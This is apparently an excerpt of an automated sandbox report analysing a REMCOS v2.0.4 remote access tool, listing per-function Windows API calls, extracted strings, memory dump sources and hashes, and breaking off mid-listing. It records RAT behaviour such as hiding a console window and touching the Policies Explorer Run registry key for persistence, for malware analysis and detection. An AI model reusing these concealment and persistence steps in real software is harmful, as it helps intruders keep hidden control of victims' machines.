                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00402766
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402770
                                                • printf.MSVCRT ref: 00402777
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402783
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040278C
                                                Strings
                                                • Timeout expired, resetting connection., xrefs: 00402750
                                                • %02i:%02i:%02i:%03i [KeepAlive] , xrefs: 00402756
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalSleepTimeV10@V?$basic_string@printf
                                                • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Timeout expired, resetting connection.
                                                • API String ID: 2756237499-72633004
                                                • Opcode ID: a143496bf836ff020b77559105cbdb0d577391cf88b37496d7c2723147fa54a2
                                                • Instruction ID: a3be9ba1a236e3a87f63a32d95a9ac84625238cc9b2f8b3aa3152655e0709ad0
                                                • Opcode Fuzzy Hash: a143496bf836ff020b77559105cbdb0d577391cf88b37496d7c2723147fa54a2
                                                • Instruction Fuzzy Hash: EB11A275900354AFCB11EFA4D9888EFBBB8BE0470270044BAF643E35C1DA79EA44C768
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A1F6
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6C995E04), ref: 0040A20E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419288), ref: 0040A21E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A22D
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A258
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A26E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A284
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A29A
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A2B0
                                                  • Part of subcall function 0040A2E7: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040A301
                                                  • Part of subcall function 0040A2E7: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A318
                                                  • Part of subcall function 0040A2E7: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A325
                                                  • Part of subcall function 0040A2E7: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A332
                                                  • Part of subcall function 0040A2E7: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A344
                                                  • Part of subcall function 0040A2E7: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A35F
                                                  • Part of subcall function 0040A2E7: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A371
                                                  • Part of subcall function 0040A2E7: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A38C
                                                  • Part of subcall function 0040A2E7: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A39E
                                                  • Part of subcall function 0040A2E7: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A3B9
                                                  • Part of subcall function 0040A2E7: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A3C2
                                                  • Part of subcall function 0040A2E7: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,0041409C,00000000), ref: 0040A3E3
                                                  • Part of subcall function 0040A2E7: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040A3F5
                                                  • Part of subcall function 0040A2E7: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A402
                                                  • Part of subcall function 0040A2E7: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040A40F
                                                  • Part of subcall function 0040A2E7: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040A419
                                                  • Part of subcall function 0040207B: closesocket.WS2_32(?), ref: 00402080
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A2D3
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A2DC
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@$G@std@@$D@1@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$?substr@?$basic_string@G@2@@std@@$??4?$basic_string@?find@?$basic_string@FileG@1@@ModuleNameV01@V10@V10@0@V10@@closesocket
                                                • String ID:
                                                • API String ID: 4182931601-0
                                                • Opcode ID: 4b8c786c2a928653d7c78b2a97718db67de5fb97f14792d64cacc02092ef4fff
                                                • Instruction ID: ebdaf62e5d1fa17edd53f487213fbe570907a26ffe3c30d79c9180b86d0f7dda
                                                • Opcode Fuzzy Hash: 4b8c786c2a928653d7c78b2a97718db67de5fb97f14792d64cacc02092ef4fff
                                                • Instruction Fuzzy Hash: 1E216D35A00115ABCF04BBB5DC5A9FE3B38EB44705F4084ADF512A71E1EE389604CB9A
                                                APIs
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,00000000,00000002,00000000,00000001), ref: 0040D11B
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D125
                                                • CreateDirectoryW.KERNEL32(00000000), ref: 0040D12C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D138
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D144
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@G@Z.MSVCP60(0000002A), ref: 0040D14F
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D15E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D173
                                                  • Part of subcall function 004031ED: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00403203
                                                  • Part of subcall function 004031ED: FindFirstFileW.KERNEL32(00000000), ref: 0040320A
                                                  • Part of subcall function 004031ED: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,00000000,?,?,?,?), ref: 00403237
                                                  • Part of subcall function 004031ED: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00403241
                                                  • Part of subcall function 004031ED: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403258
                                                  • Part of subcall function 004031ED: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00403375
                                                  • Part of subcall function 004031ED: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040337E
                                                  • Part of subcall function 004031ED: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00403387
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0041498C), ref: 0040D54E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@D@std@@$D@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@Hstd@@V01@@V10@0@V?$basic_string@$D@2@@0@$??2@?length@?$basic_string@CreateDirectoryFileFindFirstG@1@@G@2@@0@V01@Y?$basic_string@
                                                • String ID:
                                                • API String ID: 1908257178-0
                                                • Opcode ID: 409efb9b29ab25040bfe6cb67da4fa2f56f7ed44cd30bfb8f7d61fc6265d70ae
                                                • Instruction ID: 375646913a9a8a1342f7d2a4222f749ec185f0d93e1fb1fc51b43a2be6bb52fd
                                                • Opcode Fuzzy Hash: 409efb9b29ab25040bfe6cb67da4fa2f56f7ed44cd30bfb8f7d61fc6265d70ae
                                                • Instruction Fuzzy Hash: 5021CF729011199FDF04FFA1DC9A9EE7738BB14306F0045BAE502A20A1EE785648CB59
                                                APIs
                                                • AllocConsole.KERNEL32(75920F10,00419BC8,00000000), ref: 0041267C
                                                • GetConsoleWindow.KERNEL32 ref: 00412682
                                                • ShowWindow.USER32(00000000,00000000), ref: 00412696
                                                • freopen.MSVCRT ref: 004126AF
                                                • printf.MSVCRT ref: 0041275B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ConsoleWindow$AllocShowfreopenprintf
                                                • String ID: * Breaking-Security.Net$ * REMCOS v$2.0.4 Pro$CONOUT$
                                                • API String ID: 758035570-1312803301
                                                • Opcode ID: fe35d73c3909b68fd663ab14453d9ace36d165e86d489a094a6a4ec23f6f522f
                                                • Instruction ID: 9cf6bf6be2a058413d0ce4d8efc710578c05c633be43f3bb0f60aecc53f80403
                                                • Opcode Fuzzy Hash: fe35d73c3909b68fd663ab14453d9ace36d165e86d489a094a6a4ec23f6f522f
                                                • Instruction Fuzzy Hash: 68210832B002085BCF199F7DECA55AE7A97ABC8752B54817DF80BC72C0DEA44E488648
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A341,?), ref: 00411032
                                                • time.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,0040A341,?), ref: 0041104A
                                                • srand.MSVCRT ref: 00411057
                                                • rand.MSVCRT ref: 0041106B
                                                • rand.MSVCRT ref: 0041107F
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,0040A341,?), ref: 00411092
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0040A341,?,?,?,?,?,?,?,0040A341,?), ref: 004110A2
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040A341,?), ref: 004110AB
                                                Strings
                                                • abcdefghijklmnopqrstuvwxyz, xrefs: 0041103A
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@rand$??1?$basic_string@D@1@@V01@V01@@Y?$basic_string@srandtime
                                                • String ID: abcdefghijklmnopqrstuvwxyz
                                                • API String ID: 3357298394-1277644989
                                                • Opcode ID: 75c4886a7ca4c2f9da8c9f7a2a1fef184039798116a6aa9502c97216a2d866d2
                                                • Instruction ID: e52e3aa52b5cb3881a484791b4ed8444f345c8503b2a37bd30617961f85d57e2
                                                • Opcode Fuzzy Hash: 75c4886a7ca4c2f9da8c9f7a2a1fef184039798116a6aa9502c97216a2d866d2
                                                • Instruction Fuzzy Hash: 6211A577900219ABCF04EF60EC49AEE7B79EB44312F104026FA01D71D0DB759A46CB68
                                                APIs
                                                • GetLocalTime.KERNEL32(?,?,00419D80,?,?,?,?,?,?,?,?,?,?,?,0040C7BC), ref: 004025D5
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Timeout changed to %i,?,?,0040C7BC,?,?,?,00419D80), ref: 00402601
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00419D80,?,?,?,?,?,?,?,?,?,?,?,0040C7BC), ref: 0040260C
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,00419D80,?,?,?,?,?,?,?,?,?,?,?,0040C7BC), ref: 00402616
                                                • printf.MSVCRT ref: 0040261D
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402629
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402632
                                                Strings
                                                • Timeout changed to %i, xrefs: 004025F6
                                                • %02i:%02i:%02i:%03i [KeepAlive] , xrefs: 004025FC
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                                • String ID: %02i:%02i:%02i:%03i [KeepAlive] $Timeout changed to %i
                                                • API String ID: 1710008465-867111061
                                                • Opcode ID: 305ec9b8a91a4dd133d838243bdb27001714bc761b52a7e71150a5b56fdc88be
                                                • Instruction ID: a55c655ecbc62547e9e979188987b4f8d64e86c80e616b317f6321b1afe19ad7
                                                • Opcode Fuzzy Hash: 305ec9b8a91a4dd133d838243bdb27001714bc761b52a7e71150a5b56fdc88be
                                                • Instruction Fuzzy Hash: 6F117076800214BBCB11AFA5DC49AEFB7BCBF15702F04446BF542E21D0E7B8A645CB68
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040ACC9
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004031DE,?), ref: 0040ACD9
                                                  • Part of subcall function 004112FA: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411309
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411313
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041131C
                                                  • Part of subcall function 004112FA: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411326
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411330
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?), ref: 00411346
                                                  • Part of subcall function 004112FA: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041134F
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004031DE,80000001), ref: 0040ACF0
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004031DE), ref: 0040AD08
                                                  • Part of subcall function 0040AD45: RegOpenKeyExW.ADVAPI32(?,80000002,00000000,00000002,80000002,?,00407BEA,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000), ref: 0040AD56
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AD1F
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AD28
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AD31
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AD3A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??1?$basic_string@$??0?$basic_string@$?begin@?$basic_string@?c_str@?$basic_string@D@1@@$?end@?$basic_string@?length@?$basic_string@G@1@@OpenV01@@
                                                • String ID: origmsc
                                                • API String ID: 643209241-68016026
                                                • Opcode ID: 2c9171ac37f4d6fa257712cdd6346e4f40ea96330126c79a1d30fcacd0c05344
                                                • Instruction ID: 6c55e44a0943010ff90ef29e9deab5e02f6bc681234e841e20bcd32374ecbc90
                                                • Opcode Fuzzy Hash: 2c9171ac37f4d6fa257712cdd6346e4f40ea96330126c79a1d30fcacd0c05344
                                                • Instruction Fuzzy Hash: A711C37280010DAFCF05EF90ED598EE7778FB04305B104165F506E21A4EF35AB09CB58
                                                APIs
                                                • GetLocalTime.KERNEL32(?,00419D80,?,?,?,?,?,?,?,?,?,?,?,?,00402181,00000001), ref: 0040266C
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [KeepAlive] ,?,Disabled.,?,?,?,?), ref: 00402697
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00402181,00000001), ref: 004026A2
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00402181), ref: 004026AC
                                                • printf.MSVCRT ref: 004026B3
